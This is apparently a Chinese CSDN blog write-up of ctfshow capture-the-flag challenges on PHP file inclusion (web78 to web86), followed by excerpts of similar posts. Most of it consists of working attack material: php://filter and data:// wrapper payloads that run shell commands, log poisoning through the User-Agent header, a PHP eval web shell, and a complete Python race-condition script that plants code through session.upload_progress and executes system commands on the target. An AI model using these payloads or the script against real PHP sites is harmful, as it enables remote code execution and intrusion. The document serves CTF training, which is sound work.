ctfshow web入门-文件包含

最新推荐文章于 2024-09-06 16:20:11 发布
最新推荐文章于 2024-09-06 16:20:11 发布
阅读量510 收藏 3
点赞数 2
分类专栏: # ctfshow-web 文章标签: ctfshow 文件包含 ctf web安全 新星计划
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LYJ20010728/article/details/118161121
版权

ctfshow web入门-文件包含

web78

filter伪协议读取:?file=php://filter/read=convert.base64-encode/resource=flag.php,base64解码

if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

在这里插入图片描述
在这里插入图片描述

web79

由于过滤了 php,采用data伪协议读取:

?file=data://text/plain,<?= `tac f*`;?>
或者
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

在这里插入图片描述

web80

由于 phpdata都被过滤了,结合题目提示我们文件包含开始,利用日志包含绕过,将执行的命令插入日志中,在User-Agent插入 <?php echo system('ls');?>查找flag文件名,再读取flag

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

shell.txt内容:
<?php eval($_POST['cmd']);?>

在这里插入图片描述
在这里插入图片描述

web81

过滤了 phpdata:,参照 web81,利用日志包含绕过,将执行的命令插入日志中

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

在这里插入图片描述
在这里插入图片描述

web82-86

利用session.upload_progress进行文件包含和反序列化渗透

import requests
import threading
import sys
session=requests.session()
sess='H3rmesk1t'
url1="http://dae1ae47-1634-456b-b6bb-6046960b2e14.challenge.ctf.show:8080/"
url2='http://dae1ae47-1634-456b-b6bb-6046960b2e14.challenge.ctf.show:8080/?file=/tmp/sess_'+sess
data1={
	'PHP_SESSION_UPLOAD_PROGRESS':'<?php eval($_POST[1]);?>'
}
data2={
	'1':'system("cat f*");'
}
file={
	'file':'abc'
}
cookies={
	'PHPSESSID': sess
}
def write():
	while True:
		r = session.post(url1,data=data1,files=file,cookies=cookies)
def read():
	while True:
		r = session.post(url2,data=data2)
		if 'ctfshow{' in r.text:
			print(r.text)
threads = [threading.Thread(target=write),
       threading.Thread(target=read)]
for t in threads:
	t.start()
CTFshow 文件包含 web82
Kradress的博客
12-09 1290
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 19:34:45 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['file'])){
ctfshow WEB入门 文件上传151-170_ctfshow web入门文件包含167(1)
2401_84297265的博客
04-28 887
只是过滤了分号,其他同上。php的最后一个分号可以省略。
CTFshow web入门——文件包含
小元砸的博客
02-07 4046
Web 78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 一.分析代码: 使用 include进行了文件包含 二.解题过程: 构造playload: ?file=php://filter/read=convert.base64-encode/resource=flag.php Web 79 <?p
ctfshow-文件包含
最新发布
m0_72125469的博客
09-06 1212
结果是是这个原因 include包含的文件如果存在路径 他会按照指定路径查找文件 如果只存在文件名不存在路径 include首先会去定义的位置进行寻找文件 没有则在当前文件所在的目录和当前工作目录下寻找 所以不影响我们 线程5应该就可以了 不需要高并发导致的不确定行为 而是普通的和服务器删除速度来竞争 不是高并发的竞争。这里说一下 提交请求后的请求体是 不是想象的那种post 键值对的形式 而是表单的形式PHP_SESSION_UPLOAD_PROGRESS 也在表单中 这块的简单知识点 有时间得看看。
ctfshow->web入门->文件包含
m0_74940843的博客
11-04 590
服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接)。
ctfshow web入门文件包含
Blazing-Angel的博客
07-19 724
ctfshow
WEB-ctfshow入门文件包含
ing_end的博客
06-04 473
查看源码可以发现只能上传png图片 修改为php 修改上传格式为php,上传一句话马,蚁剑连接得flag 后端校验 上传一句话,png文件用burp抓包 修改文件名后缀为php,访问被解析,蚁剑连接得flag。打开发现/upload下存在index.php文件,我们可以利用.user.ini, 前端把后缀限制去掉,accept改为file,上传user.ini Content-Type修改为image/png 蚁剑连接得flag。 提示文件内容不合规,发现过滤php,可使用短标签 蚁剑连接得f
ctfshow-web入门-信息搜集wp
m0_53567065的博客
10-31 687
ctfshow-web入门-信息收集wp
ctfshow web入门文件包含82-86
xiaolong22333的博客
12-14 2459
知识点: 利用session.upload_progress进行文件包含 条件竞争 思路就是通过上传PHP_SESSION_UPLOAD_PROGRESS来访问/tmp/sess_xxx,从而进行文件包含 原理可以看这篇文章利用session.upload_progress进行文件包含和反序列化渗透 其中主要的几点 首先上传PHP_SESSION_UPLOAD_PROGRESS,代码如下 <!DOCTYPE html> <html> <body> <f
ctfshow web入门 文件包含
Lum1n0us's Blog
02-03 1082
文章目录web78web79web80-81web82-86web87web88web116web117参考链接 web78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 第一题是最基础的文件包含,直接上payload payload: ?file=php://filter/convert.base64-enco
CTFshow web入门web82-文件包含5
weixin_74336671的博客
12-06 676
因为有die(与exit意思一样),导致即使我们成功写入一句话,也执行不了(这个过程在实战中十分常见,通常出现在缓存、配置文件等等地方,不允许用户直接访问的文件,都会被加上if(!$file是我们我们可控的协议流,我们使用base64编码,在解码时去掉退出代码中不支持的字符,变为phpdie,在后面加上aa使得能正常解码phpdieaa(base64编码解码特性,4字节一组)file_put_contents(urldecode($file), "<?php die('大佬别秀了');
CTFshow——web入门——文件包含
h_adam的博客
10-24 4228
web入门——文件包含web78 web78 题目 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 题解
ctfshow+web入门文件包含
m0_59448417的博客
04-13 740
ctfshow+web入门文件包含
ctfshow_web入门_文件包含_web78~web117
qq_62989306的博客
09-13 882
文件包含php://filter伪协议、data协议、包含日志文件、session.upload_progress利用、条件竞争、死亡绕过……
CTFSHOW web入门 文件包含
羽的博客
04-28 3763
文章目录web78web79web80web81web82-86web87web88web116web117 web78 filter伪协议 payload file=php://filter/convert.base64-encode/resource=flag.php 解码后得到flag web79 data伪协议 payload file=data://text/plain,<?=`tac f*`;?> web80 远程文件包含 xxx为自己服务器地址 ?file=http://xxxx
ctfshow-web入门-文件包含web88、web116、web117)
Welcome To Myon'Blog !
07-06 1197
没有过滤冒号 : ,可以使用 data 协议,但是过滤了括号和等号,因此需要编码绕过一下。这里有点问题,我 ('ls') 后加上分号发现不行,可能是编码结果有加号,题目做了过滤去掉分号得到 PD9waHAgc3lzdGVtKCdscycpPz4=,传入时要把等号去掉,因为题目过滤掉了等号,否则会触发 die 函数,即使去掉等号,base64 解码也是
CTFshow web入门文件包含
qq_39948058的博客
10-04 2142
前言:看题 web78: if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 发现include是文件包含没错了,伪协议读取出来就可以了 exp:?file=php://filter/convert.base64-encode/resource=flag.php web79: ...
ctfshow WEB入门 文件上传151-170_ctfshow web入门文件包含167(2)
2401_84297265的博客
04-28 995
这里我的后门代码给的是post一定要把请求方法改成post(URL前面的),我以前一直没有注意这个细节,想来有很多莫名其妙的问题多半是因为这个。这里希望能得到大家的指点。我还尝试了对比上传两张图片的内容,在非修改处的地方进行插入木马,但是错了,不知道是因为我操作上有问题,还是说这样会导致图片内容不完整。说明里面的后门代码生效了,且内容在图片内容里面,抓包或者010editor等里面才看得出来,浏览器看不出来。且这道题对图片内容也有检测,也就是说不能像之前的题给它传一个图片头就完了,要有合法的图片内容。
文件包含ctfshow web入门
qq_47168481的博客
11-17 3432
web79 本题考察php伪协议中的其他方法,对php进行了过滤 if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); include($file); } 可以采用data伪协议 file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg== 后面的base64
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值